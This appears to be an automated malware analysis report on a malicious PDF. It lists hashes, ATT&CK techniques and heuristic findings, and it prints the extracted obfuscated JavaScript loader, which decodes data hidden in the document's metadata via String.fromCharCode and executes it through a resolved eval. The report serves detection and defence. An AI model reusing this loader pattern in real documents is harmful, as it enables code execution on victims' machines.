Malicious PDF — malware analysis report

Static analysis result for SHA-256 7e9f53fd3f98fcf4…

MALICIOUS

PDF

18.1 KB Created: 2011-72-51 03:25:00 Authoring application: String.fromCharCode First seen: 2013-07-25
MD5: 446a0f4257e9e74e1a4b572134f1ee7a SHA-1: 105567bd59b59e3649c01f1a82af4b84cb38da03 SHA-256: 7e9f53fd3f98fcf423e074974cadb1f503e5e60657c4b8d5ac83015f157ab283
114 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains embedded JavaScript, identified by multiple heuristics including 'PDF_JAVASCRIPT' and 'PDF_JS_EXPLOIT_CLUSTER'. The JavaScript code appears to be obfuscated but is designed to execute arbitrary code, likely downloading and running a secondary payload. The use of String.fromCharCode further suggests obfuscation to hide malicious functionality. Given these factors, the primary attack pattern is exploitation via a malicious PDF attachment.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    /Producer (String.fromCharCode)
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x4635 345 bytes
SHA-256: 8abc4d4ac6d35ecefcf29eaf3539e7494aa2bb47158026d4f3458da9cb432938
Preview script
First 1,000 lines of the extracted script
var w = 4;
var pvs = this.title.replace(/w/g,'*w,');
pvs = pvs.replace(/t/g,'2');
pvs=pvs.substr(0,pvs.length-2) + ']';
xtf=function(){return function(){return this}()}();
hks=xtf[this.subject];
kevr=hks(this.producer);
cpg = hks(pvs);
var s = '';
for (i = 0; i < cpg.length; i++) {
	dfnrq = cpg[i];
	s += kevr(dfnrq);
}
hks(s);